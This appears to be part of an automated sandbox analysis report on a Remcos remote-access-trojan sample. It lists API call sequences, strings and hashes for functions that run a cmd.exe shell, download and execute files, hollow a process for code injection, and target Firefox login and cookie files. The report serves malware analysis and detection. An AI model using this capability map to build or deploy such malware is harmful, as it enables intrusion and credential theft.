WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
recv.WS2_32(?,?,?,00000000), ref: 00404BDA

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: EventObjectSingleWaitrecv
String ID:
API String ID: 311754179-0
Opcode ID: 892a44a7d3238735dc6a48834f3a0d54c5d7f95f760ba03120f4e8939475261b
Instruction ID: 696cc5fcca0fef600b7ec92c1ce6b898062c6d35d7bca60e035961dc641c3578
Opcode Fuzzy Hash: 892a44a7d3238735dc6a48834f3a0d54c5d7f95f760ba03120f4e8939475261b
Instruction Fuzzy Hash: CAF08236108213FFC7059F10EC09E4AFBA2FF84721F10862AF510522A18771FC20DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409DFD

Strings

pQG, xrefs: 00409E2D

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _wcslen
String ID: pQG
API String ID: 176396367-3769108836
Opcode ID: ce79a04ebf4fd5ad33c8929c428e8b75ef0dd90ae827798176b0cff7311ba38e
Instruction ID: 95d278e3f05488c0820dd2c8153ac27ae1675786c683aeaf702fa7e1242427c2
Opcode Fuzzy Hash: ce79a04ebf4fd5ad33c8929c428e8b75ef0dd90ae827798176b0cff7311ba38e
Instruction Fuzzy Hash: 6C11C6319002059BCB15EF65E8519EF77B4EF54318B10413FF805A62E2EF789D05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041B704 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B718

Strings

@, xrefs: 0041B70E

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94

Uniqueness

Uniqueness Score: -1.00%

Function 0044EE18 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

Part of subcall function 0044EF37: _abort.LIBCMT ref: 0044EF69
Part of subcall function 0044EF37: _free.LIBCMT ref: 0044EF9D

Part of subcall function 0044EBAC: GetOEMCP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBD7

_free.LIBCMT ref: 0044EE90
_free.LIBCMT ref: 0044EEC6

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: d4f12453d6797030d5dc3602a21d42d574daa5b640ebd775749f27024f3c7875
Instruction ID: afb2a9087478ec41e314e0473c94043602b5b99840e25ac3086ca26a5d64e734
Opcode Fuzzy Hash: d4f12453d6797030d5dc3602a21d42d574daa5b640ebd775749f27024f3c7875
Instruction Fuzzy Hash: 3F31B331904208AFEB10EBABD441BAA77E4FF40364F35409FE9049B2A1EB399D41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 00404852
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E

Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: 521f5ece035b781d6614b92269cfb6f5cbcb1df57b0ec94ab883829d9db72848
Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
Opcode Fuzzy Hash: 521f5ece035b781d6614b92269cfb6f5cbcb1df57b0ec94ab883829d9db72848
Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004436EB Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00443739

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 46b585aab576b37ad3e48a0b6346da99b96b327e84507ec42d72745901d9332c
Instruction ID: 3e8f64bc5ed55066a36edb92307bbee41a7a19d03423297ea4ea0071b53a58e7
Opcode Fuzzy Hash: 46b585aab576b37ad3e48a0b6346da99b96b327e84507ec42d72745901d9332c
Instruction Fuzzy Hash: A9E0EC9260551021F571363F6C0A75B05499B8177FF12833BF424861C0CFAC4946419E

Uniqueness

Uniqueness Score: -1.00%

Function 0041B9E4 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0041BA06
GetWindowTextW.USER32 ref: 0041BA19

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Window$ForegroundText
String ID:
API String ID: 29597999-0
Opcode ID: 37bc9f448460fd1a8cd65ff34a710c4e1c0024134306fb5edc35e71c98be8f28
Instruction ID: 637cd5112d301657ed660dbb1bed4a0c67cc53091dd33397c2e6fc7b47bdc960
Opcode Fuzzy Hash: 37bc9f448460fd1a8cd65ff34a710c4e1c0024134306fb5edc35e71c98be8f28
Instruction Fuzzy Hash: 75E0D871A00328A7E720A7A4AC4EFE5776CEB08711F0000EABA18D31C2EAB49D04C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041B55B Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,0040F171), ref: 0041B590

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9167295f8432bcd57fb576626eea4e25c386a7a518f3d3aa5e9611e2b6c4d6a9
Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
Opcode Fuzzy Hash: 9167295f8432bcd57fb576626eea4e25c386a7a518f3d3aa5e9611e2b6c4d6a9
Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00445A33 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044818A,00000001,00000364,?,00000000,00000000,0043BBC7,00000000,00000000,?,0043BC4B,00000000), ref: 00445A74

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
Instruction ID: bdb0e33e5721535a497c71cc9b1cca338f3da8d9e5fc8602029d377f2be5a4ff
Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
Instruction Fuzzy Hash: 2AF0B432500D246BBF219A629C81B5B3749AB417A0B188327E809BA282CA78D80146BC

Uniqueness

Uniqueness Score: -1.00%

Function 00446077 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction ID: fc72969beeef8e46adb3e5c897d71457bd534b1de3a68609239d713461f06929
Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction Fuzzy Hash: ADE0E53110061566FA31BAA69C04B5B368D8B037A5F164123EC0596281DA6CCC0041AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004048B3

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA

Uniqueness

Uniqueness Score: -1.00%

Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

std::_Deallocate.LIBCONCRT ref: 00402E2B

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Deallocatestd::_
String ID:
API String ID: 1323251999-0
Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00407CB9
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
DeleteFileW.KERNEL32(00000000), ref: 00407DA9

Part of subcall function 0041C1DF: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C23A
Part of subcall function 0041C1DF: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C26A
Part of subcall function 0041C1DF: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2BF
Part of subcall function 0041C1DF: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C320
Part of subcall function 0041C1DF: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C327

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
GetLogicalDriveStringsA.KERNEL32 ref: 00408278
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
DeleteFileA.KERNEL32(?), ref: 00408652

Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF

Sleep.KERNEL32(000007D0), ref: 004086F8
StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A

Part of subcall function 0041C930: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CA25

Strings

XPG, xrefs: 00408430
Downloading file: , xrefs: 00407F7D
XPG, xrefs: 00408718
XPG, xrefs: 004082E7
Downloaded file: , xrefs: 0040802E
XPG, xrefs: 00407DED
Browsing directory: , xrefs: 00408238
Executing file: , xrefs: 004081AD
Unable to delete: , xrefs: 00407E07
Failed to download file: , xrefs: 004080A5
Unable to rename file!, xrefs: 00408413
Deleted file: , xrefs: 00407DC8
NG, xrefs: 00407CE5
open, xrefs: 00408191
(PG, xrefs: 004081F2

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
API String ID: 1067849700-181434739
Opcode ID: 1bf8eb397982a158c97228fc9dc483f16833d24416ade9af270beac70ea58c75
Instruction ID: 90b1a348b1d799a82cead3257c211a36afb2c35d21ecd37c7c023c3bbace4ffa
Opcode Fuzzy Hash: 1bf8eb397982a158c97228fc9dc483f16833d24416ade9af270beac70ea58c75
Instruction Fuzzy Hash: 8C428171A043016BC604FB76C9579AF77A5AF91348F80093FF542671E2EE7C9A08879B

Uniqueness

Uniqueness Score: -1.00%

Function 0040569A Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CBC,00476CA4,00476BC8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CA8,00476CC4,00476BC8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BD8,00476CAC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 004346BE: __onexit.LIBCMT ref: 004346C4

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

lG, xrefs: 004056D0
cmd.exe, xrefs: 0040574D
lG, xrefs: 00405988
lG, xrefs: 00405954
SystemDrive, xrefs: 00405761
lG, xrefs: 00405A2D
lG, xrefs: 0040585A

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: lG$ lG$ lG$ lG$ lG$SystemDrive$cmd.exe
API String ID: 2994406822-4099966829
Opcode ID: d03cecef8ac8c825a180516c4d22f2b09528c3df341169639ad36729b41b3966
Instruction ID: de4e4ebcbe15d3830e6e521ad2e1eecf7f6dbcbc683575455a8755bc669fea45
Opcode Fuzzy Hash: d03cecef8ac8c825a180516c4d22f2b09528c3df341169639ad36729b41b3966
Instruction Fuzzy Hash: 1B91E471604604AFD711BB25ED42A6F3A9AEB80348F01443FF549A72E2DF7D5C488B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00412045 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412054

Part of subcall function 004137C5: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 004137D3
Part of subcall function 004137C5: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137EE
Part of subcall function 004137C5: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137F9

OpenMutexA.KERNEL32 ref: 00412094
CloseHandle.KERNEL32(00000000), ref: 004120A3
CreateThread.KERNEL32(00000000,00000000,0041273C,00000000,00000000,00000000), ref: 004120F9
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412368

Strings

Watchdog launch failed!, xrefs: 004122D1
svchost.exe, xrefs: 00412213
Remcos restarted by watchdog!, xrefs: 004120AE
\system32\, xrefs: 00412157
C}w, xrefs: 004120F9
Watchdog module activated, xrefs: 004120D2, 0041232A
rmclient.exe, xrefs: 00412238
\SysWOW64\, xrefs: 004121AF
fsutil.exe, xrefs: 0041225D
WDH, xrefs: 00412103, 00412109, 0041236E
WinDir, xrefs: 00412169, 004121BE

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$C}w
API String ID: 3018269243-1860860081
Opcode ID: 4bcd0f219016ec97be1e9d939f8da0c10b526a52679b03460c5426fc19120eff
Instruction ID: 0d13d43ad637dff1fe81996a96760afe0bf10590795afb9f1943340568bde94f
Opcode Fuzzy Hash: 4bcd0f219016ec97be1e9d939f8da0c10b526a52679b03460c5426fc19120eff
Instruction Fuzzy Hash: 2071A03160430167C218FB72DD5B9AE77A4AF94708F40057FB586A20E2FFBC9949C69A

Uniqueness

Uniqueness Score: -1.00%

Function 00CB34C0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 144injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00CB34DC
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,00000000), ref: 00CB3535
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,00000000), ref: 00CB354E
GetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00CB3563
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000,?,?,00000000), ref: 00CB3581
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,00000000), ref: 00CB3599
GetProcAddress.KERNEL32(00000000), ref: 00CB35A0
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,00000000), ref: 00CB35BF
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,00000000), ref: 00CB35DA
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00CB360C
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,?,00000000), ref: 00CB363C
SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,?,00000000), ref: 00CB3652
ResumeThread.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 00CB365B
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00CB3669

Strings

NtUnmapViewOfSection, xrefs: 00CB358F
ntdll.dll, xrefs: 00CB3594
, xrefs: 00CB3579

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Process$Memory$ThreadVirtualWrite$AllocContextModule$AddressCreateFileFreeHandleNameProcReadResume
String ID: $NtUnmapViewOfSection$ntdll.dll
API String ID: 4232606500-1522589568
Opcode ID: 7f48af93f937722a396c37bd44b4161abe34d2f4b8235abd4b0f73aaf5fcfd30
Instruction ID: 4aa36f2e826f87d522b0994316bb796f8dd00e030d03c4893d2fd3f3a67da2e9
Opcode Fuzzy Hash: 7f48af93f937722a396c37bd44b4161abe34d2f4b8235abd4b0f73aaf5fcfd30
Instruction Fuzzy Hash: 2F513771A40209BFEB109FA4DC85FEEBBB8BF08700F504026F615EA290D7B5AA55CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA7E Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BAFD
FindClose.KERNEL32(00000000), ref: 0040BB17
FindNextFileA.KERNEL32(00000000,?), ref: 0040BC3A
FindClose.KERNEL32(00000000), ref: 0040BC60

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BAA0
[Firefox StoredLogins not found], xrefs: 0040BB22
\key3.db, xrefs: 0040BBC4
\logins.json, xrefs: 0040BB82
UserProfile, xrefs: 0040BAAE
[Firefox StoredLogins Cleared!], xrefs: 0040BC4D

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: b7ff0b334e66b397f6b5f2ce9c9ac90d4baeb29ca37303a0e564a64990128067
Instruction ID: 0c444b27639c9c5018b15d678d008ce1e60e4a17353ccb3dd71c17b9335bc626
Opcode Fuzzy Hash: b7ff0b334e66b397f6b5f2ce9c9ac90d4baeb29ca37303a0e564a64990128067
Instruction Fuzzy Hash: 11515D3190421A9ADB14F7A2DC56DEEB739AF11304F50057FF406760E2EF785A89CA8D

Uniqueness

Uniqueness Score: -1.00%

Function 0041680F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416810
EmptyClipboard.USER32 ref: 0041681E
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041683E
GlobalLock.KERNEL32 ref: 00416847
GlobalUnlock.KERNEL32(00000000), ref: 0041687D
SetClipboardData.USER32 ref: 00416886
CloseClipboard.USER32 ref: 004168A3
OpenClipboard.USER32 ref: 004168AA
GetClipboardData.USER32 ref: 004168BA
GlobalLock.KERNEL32 ref: 004168C3
GlobalUnlock.KERNEL32(00000000), ref: 004168CC
CloseClipboard.USER32 ref: 004168D2

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: !D@
API String ID: 3520204547-604454484
Opcode ID: 8c013e8972fe646e1b2dbd5ab0b8c4f959906cf82b6a63c4f40e0e46a0422db7
Instruction ID: 0fc0cf295518fbfb68c3eb210c1eb1d2336127672aab31fcd858d8c2724b716e
Opcode Fuzzy Hash: 8c013e8972fe646e1b2dbd5ab0b8c4f959906cf82b6a63c4f40e0e46a0422db7
Instruction Fuzzy Hash: 8D215171204301EBD714BBB1DC5D9BE36A9AF88742F40043EF946961E2EF38CC05C66A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC85 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BCFD
FindClose.KERNEL32(00000000), ref: 0040BD17
FindNextFileA.KERNEL32(00000000,?), ref: 0040BDD7
FindClose.KERNEL32(00000000), ref: 0040BDFD
FindClose.KERNEL32(00000000), ref: 0040BE1E

Strings

[Firefox cookies found, cleared!], xrefs: 0040BE2D
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BCA0
UserProfile, xrefs: 0040BCAE
\cookies.sqlite, xrefs: 0040BD7A
[Firefox Cookies not found], xrefs: 0040BD22, 0040BDEA

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
